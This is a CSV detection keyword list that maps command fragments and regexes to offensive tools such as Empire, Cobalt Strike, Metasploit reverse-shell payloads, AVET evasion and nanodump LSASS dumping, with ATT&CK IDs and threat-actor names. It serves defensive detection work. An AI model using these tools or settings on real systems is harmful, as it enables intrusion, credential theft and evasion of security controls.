"*set Listener onedrive*",".{0,1000}set\sListener\sonedrive.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","58530"
"*set obfuscate *",".{0,1000}set\sobfuscate\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","58531"
"*set PAYLOAD windows/x64/meterpreter_reverse_tcp*",".{0,1000}set\sPAYLOAD\swindows\/x64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","58532"
"*set PAYLOAD windows/x64/shell/reverse_tcp*",".{0,1000}set\sPAYLOAD\swindows\/x64\/shell\/reverse_tcp.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","58533"
"*set pipename *",".{0,1000}set\spipename\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","58534"
"*set Profile apt1.profile*",".{0,1000}set\sProfile\sapt1\.profile.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","58535"
"*set shellcode *",".{0,1000}set\sshellcode\s.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","58536"
"*set smartinject*",".{0,1000}set\ssmartinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","58537"
"*set spoofip 1*",".{0,1000}set\sspoofip\s1.{0,1000}","offensive_tool_keyword","metasploit","llmnr spoofing used by Dispossessor ransomware group","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58538"
"*set StageEncoder x86/shikata_ga_nai*",".{0,1000}set\sStageEncoder\sx86\/shikata_ga_nai.{0,1000}","offensive_tool_keyword","metasploit","exploits often used by ransomware groups","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven - Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58539"
"*Set the correct channel name using """"pscmdchannel"""" command*",".{0,1000}Set\sthe\scorrect\schannel\sname\susing\s\""pscmdchannel\""\scommand.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","58540"
"*set userwx*",".{0,1000}set\suserwx.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","58544"
"*set webserver_address hashcapture.com*",".{0,1000}set\swebserver_address\shashcapture\.com.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","58545"
"*set zombie *",".{0,1000}set\szombie\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","58547"
"*set_child werfault.exe*",".{0,1000}set_child\swerfault\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58548"
"*set_command_exec exec_via_cmd*",".{0,1000}set_command_exec\sexec_via_cmd.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","58549"
"*set_command_exec exec_via_powershell*",".{0,1000}set_command_exec\sexec_via_powershell.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","58550"
"*set_command_exec no_command*",".{0,1000}set_command_exec\sno_command.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","58551"
"*set_command_source download_bitsadmin*",".{0,1000}set_command_source\sdownload_bitsadmin.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","58552"
"*set_decoder xor*",".{0,1000}set_decoder\sxor.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","58553"
"*set_empty_pw.py*",".{0,1000}set_empty_pw\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tool","https://github.com/risksense/zerologon","1","1","N/A","N/A","N/A","7","657","146","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z","58554"
"*set_injection_technique*",".{0,1000}set_injection_technique.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","58555"
"*set_logon_script.py*",".{0,1000}set_logon_script\.py.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","58556"
"*set_objectpipe \\*",".{0,1000}set_objectpipe\s\\\\.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58557"
"*set_payload_execution_method exec_shellcode64*",".{0,1000}set_payload_execution_method\sexec_shellcode64.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","58558"
"*set_payload_execution_method inject_dll*",".{0,1000}set_payload_execution_method\sinject_dll.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","58559"
"*set_payload_info_source from_command_line_raw*",".{0,1000}set_payload_info_source\sfrom_command_line_raw.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","58560"
"*set_payload_source download_powershell*",".{0,1000}set_payload_source\sdownload_powershell.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","58561"
"*set_rpc_callstack*",".{0,1000}set_rpc_callstack.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","58562"
"*set_shellcode",".{0,1000}set_shellcode","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","58563"
"*set_svchost_callstack*",".{0,1000}set_svchost_callstack.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","58564"
"*set_wmi_callstack*",".{0,1000}set_wmi_callstack.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","58565"
"*set_wmiconfig \*",".{0,1000}set_wmiconfig\s\\.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58566"
"*SeTakeOwnershipPrivilegePoC.exe*",".{0,1000}SeTakeOwnershipPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58604"
"*setc_webshell*",".{0,1000}setc_webshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","58605"
"*SeTcbPrivilegePoC.exe*",".{0,1000}SeTcbPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58607"
"*Set-Content $PS2exePath*",".{0,1000}Set\-Content\s\$PS2exePath.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","58610"
